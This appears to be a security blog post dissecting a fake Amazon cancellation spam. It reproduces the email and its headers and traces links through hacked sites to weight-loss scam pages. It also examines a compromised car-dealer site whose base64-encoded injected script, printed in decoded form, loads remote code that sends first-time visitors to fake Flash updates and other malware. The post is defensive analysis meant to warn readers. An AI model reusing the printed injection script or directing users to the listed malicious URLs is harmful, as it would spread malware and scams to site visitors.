We see lots of phishing attempts. When I saw this email, my immediate first thought was another Amazon phish trying to get my account credentials or even a malware download attempt. We frequently see both with similar spoofed / fake Amazon emails. But no it is a pure and simple spam scam trying to sell you some stupid, useless weight loss remedy. If these weight loss remedies actually worked the scammers and spammers would have no need to use social engineering methods like fake cancellations or invoices to get you to the sites.
Remember many email clients, especially on a mobile phone or tablet, only show the Name in the From: and not the bit in <domain.com >. That is why these scams and phishes work so well.
The email looks like:
Date: Tue 20/06/2017 21:59
Subject: Amazon.com – Your Cancellation (127-3451-3158)
Your order has been successfully canceled. For your reference, here’s a summary of your order:
You just canceled order 127-3451-3158 placed on June 20, 2017.
1 “Inquiry”; 2002, Deluxe Edition
By: Julia Douglas
Sold by: Amazon.com LLC
Thank you for visiting Amazon.com!
Earth’s Biggest Selection
Note: Only the final IP address outside of your network in the Received: fields can be trusted as others can be spoofed
Received: from [220.127.116.11] (port=43199 helo=nietzsche.indirgezginler.net) by knight.knighthosting.co.uk with smtp (Exim 4.89) (envelope-from <email@example.com>) id 1dNNQZ-0003IF-OL for firstname.lastname@example.org; Tue, 20 Jun 2017 18:58:59 +0100 From: "email@example.com" <firstname.lastname@example.org> Content-Transfer-Encoding: 7bit To: "email@example.com" <firstname.lastname@example.org> X-AMAZON-MAIL-RELAY-TYPE: notification Message-ID: <email@example.com> Subject: Amazon.com - Your Cancellation (127-3451-3158) Date: Tue, 20 Jun 2017 20:59:00 +0000 (UTC) X-AMAZON-RTE-VERSION: 2.0 Allowed-Kneecap-Marcel: D234F637D5E42AAE Content-Type: text/html; charset=UTF-8 Reply-To: "firstname.lastname@example.org" <email@example.com> MIME-Version: 1.0 Bounces-to: firstname.lastname@example.org
If you follow the link inside see a webpage trying to sell you some stupid useless weight loss remedy looking like this: The link goes to http://bugoksts.kr/alexandre.php which redirects to http://weight-0lospremium.world/en/uagg/forskolin/?bhu=2m6RiSzYFKGHHfPuErq1zYPsU95kCeW4
other sites found with same scam include
- http://bronze-salon.com/wp-content/plugins/cherry-plugin/admin/societies.php redirects to http://diet4forlosts.world/en/uagg/forskolin/?bhu=2m6RiSzYFKGHHfPuErq1zYPsU9C7NuSw
- http://www.vinebunker.com/wp-content/incidentally.php redirects to http://fitness-4weight-losess.world/en/uagg/forskolin/?bhu=2m6Rf1QbSJC4bhJXvFZp2Ma11vMfpd3y
- http://qcblc.com/consisting.php redirects to http://diet4forweight-loss.com/en/uagg/forskolin/?bhu=2m6Rf1QbSJC4bhJXvFZp2Ma11vMhFvQY
- http://rolltime.ru/assets/images/chatting.php redirects to http://fitness-4weight-losess.world/en/uagg/forskolin/?bhu=2m6RiSzYFKGHHfPuErq1zYPsU9C8qtMr
And loads of other sites all redirecting to the same 5 scummy spam sites
This one is slightly more interesting
http://jaguar-landrovervn.com/maniac.php redirects to http://loss0weight-fast.world/en/uagg/forskolin/?bhu=2m6Rf1QbSJC4bhJXvFZp2Ma11vMoBYRu
But if you try http://jaguar-landrovervn.com you get redirected to lots of other malware & dangerous sites firstly to http://www.cpm10.com/watch which depending on your browser either sends you to a fake Adobe Flashplayer update site http://free2update.thebigbangtoupgrading.win/?pcl=Ml-InFSRlFwDIbOVaKVaktpsd0qIm8nlQK6uNl-jFnw.&sid=VjN8MTQyMTQ4Njd8OTUxMDMxfDQ1MjU2fDE0OTc5ODU4NDF8ZTU2NTBlODUtZjIyYS00MjFlLWI1YWQtYTAwYzBiMzY4MmVifDg2LjE0Ni44My4yMzZ8MXwxNDAyMTllNzc2M2YxZGMyZTIxY2NmZWViMGUzMWRjZQ==&v_id=NG124slAGzTqPH0wv4aLhSsV3nKoL1eJ5qZGaKduRBY. or to various sex cam sites, But only on first visit from an IP /browser /computer. After that you stay on the genuine landrover site
The landrover site has a base64 encoded script embedded in the head section of the site
Which when decrypted gives
Which in turn decodes to
//document.write (s) <script src=”http://keit.staticweb.tk/t6mcn1″></script>
Which then sends the browser to http://www.cpm10.com/watch but only on first visit, subsequent visits are ignored . This cpm10 site sends the unwitting victim to the range of sites to either get scammed, look at sex cams or download various fake Flash ( VirusTotal) or Java versions ( VirusTotal) on the first visit to cpm10 via the initial hacked site you are “given” a keycode so get something like this http://www.cpm10.com/watch?key=fe0a93971e993f059d7a78bf2fa5117a without the keycode referrer you just get a blank page on visiting cpm10
Doing it this way does make it harder for researchers and antivirus companies to detect & block such sites and campaigns
Some of the sites I got diverted to included:
All of these emails use Social engineering tricks to persuade you to open the attachments or follow the links in the email that come with the email. Whether it is a message saying “look at this picture of me I took last night” and it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. Or whether it is a straight forward attempt, like this one, to steal your personal, bank, credit card or email and social networking log in details. Be very careful when unzipping them and make sure you have “show known file extensions enabled“, And then look carefully at the unzipped file. If it says .EXE then it is a problem and should not be run or opened.